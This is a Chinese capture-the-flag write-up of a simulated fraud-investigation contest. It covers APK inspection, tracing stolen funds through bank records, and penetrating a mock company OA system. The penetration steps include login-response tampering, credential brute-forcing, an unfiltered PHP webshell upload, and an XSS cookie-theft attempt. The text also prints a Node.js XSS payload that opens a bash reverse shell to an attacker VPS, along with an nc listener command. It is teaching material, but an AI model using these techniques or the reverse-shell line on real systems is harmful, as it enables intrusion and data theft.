知更无糖斟茶王者巅峰挑战赛

WriteUp 2年前 (2023) admin
861 0 0

 一次模拟实战的比赛,综合考察取证、数据分析、网站渗透技能,本文仅用于比赛复盘、学习交流网络安全安全技术,请勿将技术用于非法用途,所产生的一切后果与本人本公众号无关。


知更无糖斟茶王者巅峰挑战赛

花了两天时间通关,学到了很多技巧和思路,遂记录下本次比赛解题过程


案情背景


知更无糖斟茶王者巅峰挑战赛


解题过程

 0x01 前言 

 1 欲望陷阱 


知更无糖斟茶王者巅峰挑战赛

打开题目生成的网站,下载案件背景文档case.docx

知更无糖斟茶王者巅峰挑战赛

访问短信中APP的链接,下载

知更无糖斟茶王者巅峰挑战赛

拖入GDA即可得到包名

知更无糖斟茶王者巅峰挑战赛


 2 踏雪寻痕 

知更无糖斟茶王者巅峰挑战赛

使用压缩程序解压apk,找到/assets/index.html知更无糖斟茶王者巅峰挑战赛

用浏览器打开,F12查看元素知更无糖斟茶王者巅峰挑战赛

访问其中链接到的网站,F12查看元素即可得到SDK,FLAG即为最后16位字符串知更无糖斟茶王者巅峰挑战赛


 3 曲径通幽 

知更无糖斟茶王者巅峰挑战赛

使用题目给的模拟调证平台进行调证

知更无糖斟茶王者巅峰挑战赛

在下载的表格中找到小付宝的支付订单号

知更无糖斟茶王者巅峰挑战赛

对小付宝订单号进行调证

知更无糖斟茶王者巅峰挑战赛

得到姓名,即为本题FLAG

知更无糖斟茶王者巅峰挑战赛


 4 按图索金 

知更无糖斟茶王者巅峰挑战赛

查看案情文件case.docx,得到三个泰州市游唐商业银行的收款账号

YT3226801028457114、YT3271228780646571、YT3271475162664434

对三个银行卡号的账单详细进行调证

知更无糖斟茶王者巅峰挑战赛

为了方便后续分析将第一、二、三次转账的账单信息文件分别命名为1/2/3.xlsx,打开Navicat,在本地新建一个数据库,将1/2/3.xlsx分别导入为表1/2/3,Navicat中右键点击表选择导入向导,选择Excel文件

知更无糖斟茶王者巅峰挑战赛

选择表

知更无糖斟茶王者巅峰挑战赛

知更无糖斟茶王者巅峰挑战赛

知更无糖斟茶王者巅峰挑战赛

知更无糖斟茶王者巅峰挑战赛

知更无糖斟茶王者巅峰挑战赛

知更无糖斟茶王者巅峰挑战赛

另外两张表一样导入

知更无糖斟茶王者巅峰挑战赛

根据案情,第一次受害人李楠于2022-02-10 12:23:34转账1w元,收款人为李珠轩,第二次于2022-02-10 18:45:02转账2w元,收款人为彭晓筠,第三次于2022-02-11 15:09:43转账2w元,收款人为游红美以时间为依据,筛选出每个收款人之后的支出记录

知更无糖斟茶王者巅峰挑战赛

知更无糖斟茶王者巅峰挑战赛

知更无糖斟茶王者巅峰挑战赛

根据金额以及时间判断李珠轩分别转了5k给毛友易和桂夏槐,彭晓筠将2w转给了侯雅唱,游红美分别给朱怜南、萧雅隽和赵以柳转了4k、6k、1w。再去分别调取下一级收款人的账单信息导入数据库

知更无糖斟茶王者巅峰挑战赛

知更无糖斟茶王者巅峰挑战赛

知更无糖斟茶王者巅峰挑战赛

毛友易给方南珍转了两次2.5k;桂夏槐给方吉玉转了2k,给余玉华转了3k;侯雅唱给罗新晴转了2w;朱怜南给罗新晴转了4k;萧雅隽给罗新晴转了6k;赵以柳给钟颖初转了1w。再去调取下一级的账单信息,导入数据库分析。可以得到方南珍将5k转给了罗新晴;方吉玉将2k转给了罗新晴;余玉华将2999转给了罗新晴;钟颖初将1w转给了罗新晴。整个资金链如下,最后所有赃款全部转到了罗新晴YT3291338144307289(本题FLAG)

知更无糖斟茶王者巅峰挑战赛


 5 以力破巧 

知更无糖斟茶王者巅峰挑战赛

在js文件中找到/api/flag/login

知更无糖斟茶王者巅峰挑战赛

也可以用findsomething

知更无糖斟茶王者巅峰挑战赛

访问/api/flag/login,得到本题FLAG

知更无糖斟茶王者巅峰挑战赛


 6 灯火阑珊 

知更无糖斟茶王者巅峰挑战赛

findsomething爬取到了一个/api/login接口

知更无糖斟茶王者巅峰挑战赛

在JS文件里面找到

知更无糖斟茶王者巅峰挑战赛

用ChatGPT分析登录逻辑

首先访问/api/login,抓包

知更无糖斟茶王者巅峰挑战赛

放包

知更无糖斟茶王者巅峰挑战赛

拦截返回包

知更无糖斟茶王者巅峰挑战赛

修改result的值为matched

知更无糖斟茶王者巅峰挑战赛

放包

知更无糖斟茶王者巅峰挑战赛

成功进入登录页面后,根据第三题得到的手机号去调证平台社工库调证

知更无糖斟茶王者巅峰挑战赛

得到几个账号密码

知更无糖斟茶王者巅峰挑战赛

bp抓登录包以上面用户名密码为字典进行爆破

知更无糖斟茶王者巅峰挑战赛

知更无糖斟茶王者巅峰挑战赛知更无糖斟茶王者巅峰挑战赛

得到账号密码:lowfly/lyw13841228350以及本题FLAG

知更无糖斟茶王者巅峰挑战赛


 7 破茧取丝 

知更无糖斟茶王者巅峰挑战赛

接上题,登录后台

知更无糖斟茶王者巅峰挑战赛

在客服管理中可以看到客服ID以及姓名

知更无糖斟茶王者巅峰挑战赛

在聊天查询中可以根据用户名或手机号配合客服ID查询聊天记录

知更无糖斟茶王者巅峰挑战赛

根据案件背景文档得到受害人李楠手机号18622334455,联系他的客服是小丽,查到小丽的ID

知更无糖斟茶王者巅峰挑战赛

再去查询聊天记录

知更无糖斟茶王者巅峰挑战赛

得到一个二维码,QR Research扫描得到网址

知更无糖斟茶王者巅峰挑战赛

为apk下载地址

知更无糖斟茶王者巅峰挑战赛

和第二题一样的思路,下载后解包,找到/assets/index.html

知更无糖斟茶王者巅峰挑战赛

得到本题FLAG


 8 与虎添翼 

知更无糖斟茶王者巅峰挑战赛

下载镜像,解压

知更无糖斟茶王者巅峰挑战赛

用X-Ways进行分析,找到/www/server/panel/data/default.db其中记录了宝塔的操作日志等信息

知更无糖斟茶王者巅峰挑战赛

使用Navicat打开,在logs表中找到登录的ip和端口,即为本题FLAG

知更无糖斟茶王者巅峰挑战赛


 9 刀斩虎翼 

知更无糖斟茶王者巅峰挑战赛

访问公司网站

知更无糖斟茶王者巅峰挑战赛

在联系我们处找到第1个FLAG

知更无糖斟茶王者巅峰挑战赛

在邮箱登录的忘记密码处找到第2个FLAG

知更无糖斟茶王者巅峰挑战赛

得到管理员账号为[email protected],使用第6题的密码lyw13841228350成功登录

知更无糖斟茶王者巅峰挑战赛

在已发件记录中找到一个server.zip

知更无糖斟茶王者巅峰挑战赛

下载后拿到第3个FLAG

同样在已发送记录里面找到一个重置好的密码,为第4个FLAG

知更无糖斟茶王者巅峰挑战赛

在收件箱中找到拜托该用户帮忙重置OA密码的邮件

知更无糖斟茶王者巅峰挑战赛

访问地址后面一串为第5个FLAG

使用zcq/HAU5MU4DUPT3UOUA登录OA系统

知更无糖斟茶王者巅峰挑战赛

在个人设置处可以上传文件,没有任何过滤,上传一个PHP大马,抓包得到文件路径

知更无糖斟茶王者巅峰挑战赛

访问大马并用密码登录

知更无糖斟茶王者巅峰挑战赛

在/home/zcq/data.csv找到第6个FLAG

知更无糖斟茶王者巅峰挑战赛

下载网站源码,用vscode打开,全局搜索FLAG

知更无糖斟茶王者巅峰挑战赛

在index.php将FLAG写入到了数据库中,写一个获取数据库中数据的PHP脚本

知更无糖斟茶王者巅峰挑战赛

上传到网站根目录后访问

知更无糖斟茶王者巅峰挑战赛

拿到第7个FLAG

在OA平台的向老板提建议处存在一个XSS

知更无糖斟茶王者巅峰挑战赛

使用XSS平台生成一个payload尝试打cookie

知更无糖斟茶王者巅峰挑战赛

在XSS平台中得到的数据并没有cookie

知更无糖斟茶王者巅峰挑战赛

访问一下后台,并没有任何认证机制

知更无糖斟茶王者巅峰挑战赛

发现是使用Node.js编写的

知更无糖斟茶王者巅峰挑战赛

尝试反弹shell

vps上监听本地8999端口

nc -lvnp 8999

提建议处提交

<script>require('child_process').exec('bash -c "bash -i >& /dev/tcp/xxx.x.xxx.xx/8999 0>&1"')</script>

知更无糖斟茶王者巅峰挑战赛

知更无糖斟茶王者巅峰挑战赛

在/home/boss/work/ziliao目录中找到FLAG.txt

知更无糖斟茶王者巅峰挑战赛

拿到第8个FLAG

在当前目录下有个sfz.png,可能是重要线索

知更无糖斟茶王者巅峰挑战赛

base64 sfz.png > sfz.txt

将其base64编码输出到sfz.txt,再复制sfz.txt中内容

知更无糖斟茶王者巅峰挑战赛

使用https://www.ec95.com/进行解码转换为png文件

知更无糖斟茶王者巅峰挑战赛

得到一张身份证,在/home/boss/work/kehu目录下找到kehu.xlsx

知更无糖斟茶王者巅峰挑战赛

一样进行base64编码输出到txt文件中再复制内容进行解码

知更无糖斟茶王者巅峰挑战赛

发现需要密码,使用passwarekit爆破

知更无糖斟茶王者巅峰挑战赛

得到密码184428,对应上了前面得到的身份证后6位,打开xlsx得到第9个FLAG

知更无糖斟茶王者巅峰挑战赛


复盘总结

通过本次比赛,学习到了一套较完整的取证、资金流分析思路,了解到了一点真实案件的侦办难度,最后的nodejs命令执行反弹shell,是作者第一次接触,之前从来没有想过通过一个XSS漏洞可以执行命令反弹shell,网安之路道阻且长,继续学习!



本文章仅对个人学习过程进行记录总结,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关,如果喜欢还请多多点赞和关注


持续更新学习笔记

您的关注就是对我最大的支持

原文始发于微信公众号(XiAnG学安全):知更无糖斟茶王者巅峰挑战赛

版权声明:admin 发表于 2023年4月10日 上午7:01。
转载请注明:知更无糖斟茶王者巅峰挑战赛 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...